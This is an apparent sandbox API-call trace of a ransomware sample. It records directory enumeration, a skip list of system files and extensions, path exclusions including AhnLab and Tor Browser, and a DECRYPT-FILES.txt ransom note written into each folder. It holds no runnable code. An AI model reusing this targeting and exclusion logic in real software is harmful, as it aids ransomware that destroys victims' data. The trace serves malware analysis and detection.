[0080.436] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0080.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.436] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.436] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0080.437] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.437] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0080.437] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0080.437] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0080.437] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.437] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.439] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.439] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.439] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.439] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.439] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.439] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0080.439] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.439] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0080.439] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp" [0080.439] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.440] CloseHandle (hObject=0x0) returned 0 [0080.440] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.440] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.440] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0080.440] CloseHandle (hObject=0x460) returned 1 [0080.440] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.440] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.440] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0080.440] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.440] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0080.440] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0080.440] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0080.440] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="autorun.inf") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="boot.ini") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="desktop.ini") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="iconcache.db") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="bootsect.bak") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat.log") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="thumbs.db") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="Bootfont.bin") returned 1 [0080.441] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0080.441] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.441] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0080.441] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0080.441] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0080.441] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.441] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.441] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.441] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.441] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.442] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.442] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.442] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0080.442] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.442] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0080.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp" [0080.442] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.442] CloseHandle (hObject=0x0) returned 0 [0080.442] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.442] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0080.442] lstrcmpW (lpString1="Maintenance", lpString2=".") returned 1 [0080.442] lstrcmpW (lpString1="Maintenance", lpString2="..") returned 1 [0080.442] lstrcatW (in: lpString1="Maintenance", lpString2="\\" | out: lpString1="Maintenance\\") returned="Maintenance\\" [0080.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Maintenance\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Program Files") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch=":\\Windows") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Games\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\All Users") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="AhnLab") returned 0x0 [0080.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.443] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0080.443] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.443] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\jkbimi8.tmp") returned 108 [0080.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0080.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0080.444] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.444] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt") returned 114 [0080.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0080.444] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0080.445] CloseHandle (hObject=0x464) returned 1 [0080.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0080.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0080.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0080.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.446] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.446] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.446] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.446] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.446] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0080.446] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.446] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0080.446] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0080.446] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0080.446] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="autorun.inf") returned 1 